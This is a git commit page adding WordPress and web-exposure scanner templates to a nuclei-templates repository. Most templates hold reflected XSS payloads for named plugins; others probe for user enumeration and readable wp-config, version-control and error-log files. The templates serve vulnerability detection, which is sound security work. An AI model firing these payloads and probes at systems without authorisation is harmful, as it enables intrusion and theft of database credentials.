daffainfo
/
my-nuclei-templates
mirror of https://github.com/daffainfo/my-nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding some templates

main
Muhammad Daffa 2021-07-14 07:03:05 +07:00
parent 40e95b0992
commit 5ea03c0605
21 changed files with 645 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
CVE-2012-4242.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2012-4242
info:
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2013-2287.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2013-2287
info:
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2013-3526.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2013-3526
info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2014-9094.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-9094
info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

35
CVE-2017-5487.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2017-5487
info:
name: WordPress Core < 4.7.1 - Username Enumeration
author: Manas_Harsh,daffainfo,geeknik
severity: info
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
- type: word
words:
- '"id":'
- '"name":'
- '"avatar_urls":'
condition: and

31
CVE-2019-14470.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2019-14470
info:
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/9815
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2019-15889.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2019-15889
info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
CVE-2020-29395.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-29395
info:
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

57
error-logs.yaml Normal file
View File

@ -0,0 +1,57 @@
id: error-logs
info:
name: common error log files
author: geeknik,daffainfo
severity: low
tags: logs,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/routes/error_log"
- "{{BaseURL}}/config/error_log"
- "{{BaseURL}}/error_log"
- "{{BaseURL}}/errors_log"
- "{{BaseURL}}/logs/error.log"
- "{{BaseURL}}/logs/errors.log"
- "{{BaseURL}}/log/error.log"
- "{{BaseURL}}/log/errors.log"
- "{{BaseURL}}/errors/errors.log"
- "{{BaseURL}}/error/error.log"
- "{{BaseURL}}/errors.log"
- "{{BaseURL}}/error.log"
- "{{BaseURL}}/error.txt"
- "{{BaseURL}}/errors.txt"
- "{{BaseURL}}/admin/logs/error.log"
- "{{BaseURL}}/admin/logs/errors.log"
- "{{BaseURL}}/admin/log/error.log"
- "{{BaseURL}}/admin/error.log"
- "{{BaseURL}}/admin/errors.log"
- "{{BaseURL}}/{{Hostname}}/error.log"
- "{{BaseURL}}/{{Hostname}}/errors.log"
- "{{BaseURL}}/MyErrors.log"
- "{{BaseURL}}/log.txt"
- "{{BaseURL}}/logs.txt"
- "{{BaseURL}}/log.log"
- "{{BaseURL}}/application/logs/application.log"
- "{{BaseURL}}/application/logs/default.log"
matchers-condition: and
matchers:
- type: word
words:
- "Segmentation Fault"
- "coredump"
- "script headers"
- "Broken pipe"
- "Array"
condition: or
- type: word
words:
- text/plain
part: header
- type: status
status:
- 200

27
exposed-bitkeeper.yaml Normal file
View File

@ -0,0 +1,27 @@
id: exposed-bitkeeper
info:
name: Exposed BitKeeper Directory
author: daffainfo
severity: low
reference: https://www.bitkeeper.org/man/config-etc.html
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/BitKeeper/etc/config"
matchers-condition: and
matchers:
- type: word
words:
- "BitKeeper configuration"
- "logging"
- "email"
- "description"
condition: and
- type: status
status:
- 200

30
exposed-bzr.yaml Normal file
View File

@ -0,0 +1,30 @@
id: exposed-bzr
info:
name: Exposed BZR Directory
author: daffainfo
severity: low
reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.bzr/branch/branch.conf"
matchers-condition: and
matchers:
- type: word
words:
- "parent_location"
- "push_location"
condition: or
- type: status
status:
- 200
- type: word
part: header
words:
- "text/plain"

23
exposed-darcs.yaml Normal file
View File

@ -0,0 +1,23 @@
id: exposed-darcs
info:
name: Exposed Darcs Config
author: daffainfo
severity: low
reference: http://darcs.net/Using/Configuration#sources
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/_darcs/prefs/binaries"
matchers-condition: and
matchers:
- type: word
words:
- "Binary file regexps"
- type: status
status:
- 200

24
exposed-hg.yaml Normal file
View File

@ -0,0 +1,24 @@
id: exposed-hg
info:
name: Exposed HG Directory
author: daffainfo
severity: low
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.hg/hgrc"
matchers-condition: and
matchers:
- type: word
words:
- "[paths]"
- "default"
condition: and
- type: status
status:
- 200

39
wordpress-accessible-wpconfig.yaml Normal file
View File

@ -0,0 +1,39 @@
id: wordpress-accessible-wpconfig
info:
name: WordPress accessible wp-config
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo
severity: high
tags: wordpress,backups
requests:
- method: GET
path:
- '{{BaseURL}}/wp-config.php'
- '{{BaseURL}}/.wp-config.php.swp'
- '{{BaseURL}}/wp-config-sample.php'
- '{{BaseURL}}/wp-config.inc'
- '{{BaseURL}}/wp-config.old'
- '{{BaseURL}}/wp-config.txt'
- '{{BaseURL}}/wp-config.php.txt'
- '{{BaseURL}}/wp-config.php.bak'
- '{{BaseURL}}/wp-config.php.old'
- '{{BaseURL}}/wp-config.php.dist'
- '{{BaseURL}}/wp-config.php.inc'
- '{{BaseURL}}/wp-config.php.swp'
- '{{BaseURL}}/wp-config.php.html'
- '{{BaseURL}}/wp-config-backup.txt'
- '{{BaseURL}}/wp-config.php.save'
- '{{BaseURL}}/wp-config.php~'
- '{{BaseURL}}/wp-config.php.orig'
- '{{BaseURL}}/wp-config.php.original'
- '{{BaseURL}}/_wpeprivate/config.json'
matchers-condition: and
matchers:
- type: word
words:
- DB_NAME
- WPENGINE_ACCOUNT
part: body
- type: status
status:
- 200

29
wp-ambience-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-ambience-xss
info:
name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/38568
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
matchers-condition: and
matchers:
- type: word
words:
- "<body onload=alert(1)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-church-admin-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-church-admin-xss
info:
name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/54329/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('{{randstr}}')</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-finder-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-finder-xss
info:
name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/55217/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-knews-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-knews-xss
info:
name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/54330/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-phpfreechat-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-phpfreechat-xss
info:
name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/54332/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-securimage-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-securimage-xss
info:
name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/59816/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
wp-socialfit-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-socialfit-xss
info:
name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
author: daffainfo
severity: medium
description: |
SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: |
- https://www.exploit-db.com/exploits/37481
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(1)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200